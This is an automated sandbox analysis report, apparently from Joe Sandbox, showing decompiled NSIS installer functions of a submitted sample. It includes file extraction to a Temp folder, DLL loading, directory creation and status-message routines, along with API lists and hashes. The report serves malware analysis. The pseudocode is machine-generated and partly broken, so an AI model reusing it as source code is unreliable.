                                                                                      • API ID: CountTick$wsprintf
                                                                                      • String ID: *B$ A$ A$... %d%%$}8@
                                                                                      • API String ID: 551687249-3029848762
                                                                                      • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                      • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                      • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                      • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 790 40176f-401794 call 402da6 call 405e83 795 401796-40179c call 40653d 790->795 796 40179e-4017b0 call 40653d call 405e0c lstrcatW 790->796 802 4017b5-4017b6 call 4067c4 795->802 796->802 805 4017bb-4017bf 802->805 806 4017c1-4017cb call 406873 805->806 807 4017f2-4017f5 805->807 815 4017dd-4017ef 806->815 816 4017cd-4017db CompareFileTime 806->816 809 4017f7-4017f8 call 406008 807->809 810 4017fd-401819 call 40602d 807->810 809->810 817 40181b-40181e 810->817 818 40188d-4018b6 call 40559f call 4032b4 810->818 815->807 816->815 819 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 817->819 820 40186f-401879 call 40559f 817->820 832 4018b8-4018bc 818->832 833 4018be-4018ca SetFileTime 818->833 819->805 854 401864-401865 819->854 830 401882-401888 820->830 834 402c33 830->834 832->833 836 4018d0-4018db CloseHandle 832->836 833->836 837 402c35-402c39 834->837 839 4018e1-4018e4 836->839 840 402c2a-402c2d 836->840 842 4018e6-4018f7 call 40657a lstrcatW 839->842 843 4018f9-4018fc call 40657a 839->843 840->834 848 401901-402398 842->848 843->848 852 40239d-4023a2 848->852 853 402398 call 405b9d 848->853 852->837 853->852 854->830 855 401867-401868 854->855 855->820
                                                                                      C-Code - Quality: 75%
                                                                                      			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp", _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp");
						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
				 *0x434fb4 =  *0x434fb4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}


















                                                                                      0x0040176f
                                                                                      0x00401776
                                                                                      0x00401782
                                                                                      0x00401785
                                                                                      0x0040178a
                                                                                      0x0040178d
                                                                                      0x00401794
                                                                                      0x004017b0
                                                                                      0x00401796
                                                                                      0x00401797
                                                                                      0x00401797
                                                                                      0x004017b6
                                                                                      0x004017bb
                                                                                      0x004017bb
                                                                                      0x004017bf
                                                                                      0x004017c2
                                                                                      0x004017c7
                                                                                      0x004017c9
                                                                                      0x004017cb
                                                                                      0x004017d0
                                                                                      0x004017d0
                                                                                      0x004017db
                                                                                      0x004017db
                                                                                      0x004017ec
                                                                                      0x004017ee
                                                                                      0x004017ee
                                                                                      0x004017ef
                                                                                      0x004017ef
                                                                                      0x004017f2
                                                                                      0x004017f5
                                                                                      0x004017f8
                                                                                      0x004017f8
                                                                                      0x004017ff
                                                                                      0x0040180e
                                                                                      0x00401813
                                                                                      0x00401816
                                                                                      0x00401819
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040181b
                                                                                      0x0040181e
                                                                                      0x00401874
                                                                                      0x00401879
                                                                                      0x004015b6
                                                                                      0x0040292e
                                                                                      0x0040292e
                                                                                      0x00402c2a
                                                                                      0x00402c2d
                                                                                      0x00402c2d
                                                                                      0x00000000
                                                                                      0x00401820
                                                                                      0x00401826
                                                                                      0x0040182d
                                                                                      0x0040183a
                                                                                      0x00401845
                                                                                      0x0040185b
                                                                                      0x0040185b
                                                                                      0x0040185e
                                                                                      0x00000000
                                                                                      0x00401864
                                                                                      0x00401864
                                                                                      0x00401865
                                                                                      0x00401882
                                                                                      0x00402c33
                                                                                      0x00402c33
                                                                                      0x00402c33
                                                                                      0x00401867
                                                                                      0x00401867
                                                                                      0x00401868
                                                                                      0x00401493
                                                                                      0x0040239d
                                                                                      0x0040239d
                                                                                      0x0040239d
                                                                                      0x00401865
                                                                                      0x0040185e
                                                                                      0x00402c35
                                                                                      0x00402c39
                                                                                      0x00402c39
                                                                                      0x00401892
                                                                                      0x00401897
                                                                                      0x004018a5
                                                                                      0x004018aa
                                                                                      0x004018b0
                                                                                      0x004018b4
                                                                                      0x004018b6
                                                                                      0x004018be
                                                                                      0x004018ca
                                                                                      0x004018b8
                                                                                      0x004018b8
                                                                                      0x004018bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004018bc
                                                                                      0x004018d3
                                                                                      0x004018d9
                                                                                      0x004018db
                                                                                      0x00000000
                                                                                      0x004018e1
                                                                                      0x004018e1
                                                                                      0x004018e4
                                                                                      0x004018fc
                                                                                      0x004018e6
                                                                                      0x004018e9
                                                                                      0x004018f2
                                                                                      0x004018f2
                                                                                      0x00401901
                                                                                      0x00401906
                                                                                      0x00402398
                                                                                      0x00000000
                                                                                      0x00402398
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5
                                                                                        • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                        • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000,?,75A423A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                        • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000,?,75A423A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                        • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00403418), ref: 004055FA
                                                                                        • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll), ref: 0040560C
                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nso9723.tmp$C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll$Call
                                                                                      • API String ID: 1941528284-4111424966
                                                                                      • Opcode ID: b846e77228e1b4e43f56e55ae5b811970dee6f5a8eaf3a28d2e19650d54a60a9
                                                                                      • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                                      • Opcode Fuzzy Hash: b846e77228e1b4e43f56e55ae5b811970dee6f5a8eaf3a28d2e19650d54a60a9
                                                                                      • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 856 40559f-4055b4 857 4055ba-4055cb 856->857 858 40566b-40566f 856->858 859 4055d6-4055e2 lstrlenW 857->859 860 4055cd-4055d1 call 40657a 857->860 862 4055e4-4055f4 lstrlenW 859->862 863 4055ff-405603 859->863 860->859 862->858 864 4055f6-4055fa lstrcatW 862->864 865 405612-405616 863->865 866 405605-40560c SetWindowTextW 863->866 864->863 867 405618-40565a SendMessageW * 3 865->867 868 40565c-40565e 865->868 866->865 867->868 868->858 869 405660-405663 868->869 869->858
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                                      0x004055a5
                                                                                      0x004055af
                                                                                      0x004055b4
                                                                                      0x004055ba
                                                                                      0x004055c5
                                                                                      0x004055c8
                                                                                      0x004055cb
                                                                                      0x004055d1
                                                                                      0x004055d1
                                                                                      0x004055d7
                                                                                      0x004055df
                                                                                      0x004055e2
                                                                                      0x004055ff
                                                                                      0x00405603
                                                                                      0x0040560c
                                                                                      0x0040560c
                                                                                      0x00405616
                                                                                      0x0040561f
                                                                                      0x0040562b
                                                                                      0x00405632
                                                                                      0x00405636
                                                                                      0x00405639
                                                                                      0x0040564c
                                                                                      0x0040565a
                                                                                      0x0040565a
                                                                                      0x0040565e
                                                                                      0x00405660
                                                                                      0x00405663
                                                                                      0x00000000
                                                                                      0x00405663
                                                                                      0x004055e4
                                                                                      0x004055ec
                                                                                      0x004055f4
                                                                                      0x004055fa
                                                                                      0x00000000
                                                                                      0x004055fa
                                                                                      0x004055f4
                                                                                      0x004055e2
                                                                                      0x0040566f

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000,?,75A423A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                      • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000,?,75A423A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00403418), ref: 004055FA
                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll), ref: 0040560C
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                        • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                        • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000), ref: 00406779
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll
                                                                                      • API String ID: 1495540970-689062111
                                                                                      • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                      • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                      • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                      • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 870 40689a-4068ba GetSystemDirectoryW 871 4068bc 870->871 872 4068be-4068c0 870->872 871->872 873 4068d1-4068d3 872->873 874 4068c2-4068cb 872->874 876 4068d4-406907 wsprintfW LoadLibraryExW 873->876 874->873 875 4068cd-4068cf 874->875 875->876
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040689A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                                      0x004068b1
                                                                                      0x004068ba
                                                                                      0x004068bc
                                                                                      0x004068bc
                                                                                      0x004068c0
                                                                                      0x004068d3
                                                                                      0x004068cd
                                                                                      0x004068cd
                                                                                      0x004068cd
                                                                                      0x004068ec
                                                                                      0x00406900
                                                                                      0x00406907

                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                      • wsprintfW.USER32 ref: 004068EC
                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                      • API String ID: 2200240437-1946221925
                                                                                      • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                      • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                                      • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                      • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 877 405a6e-405ab9 CreateDirectoryW 878 405abb-405abd 877->878 879 405abf-405acc GetLastError 877->879 880 405ae6-405ae8 878->880 879->880 881 405ace-405ae2 SetFileSecurityW 879->881 881->878 882 405ae4 GetLastError 881->882 882->880
                                                                                      C-Code - Quality: 100%
                                                                                      			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                      0x00405a79
                                                                                      0x00405a7d
                                                                                      0x00405a80
                                                                                      0x00405a86
                                                                                      0x00405a8a
                                                                                      0x00405a8e
                                                                                      0x00405a96
                                                                                      0x00405a9d
                                                                                      0x00405aa3
                                                                                      0x00405aaa
                                                                                      0x00405ab1
                                                                                      0x00405ab9
                                                                                      0x00405abb
                                                                                      0x00000000
                                                                                      0x00405abb
                                                                                      0x00405ac5
                                                                                      0x00405acc
                                                                                      0x00405ae2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405ae4
                                                                                      0x00405ae8

                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                      • GetLastError.KERNEL32 ref: 00405AC5
                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                      • GetLastError.KERNEL32 ref: 00405AE4
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 3449924974-3355392842
                                                                                      • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                      • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                      • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                      • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 710316BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      C-Code - Quality: 100%
                                                                                      			E710316BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10); // executed
				GlobalFree(_t10);
				return _t7;
			}






                                                                                      0x710316d7
                                                                                      0x710316e3
                                                                                      0x710316f0
                                                                                      0x710316f7
                                                                                      0x71031700
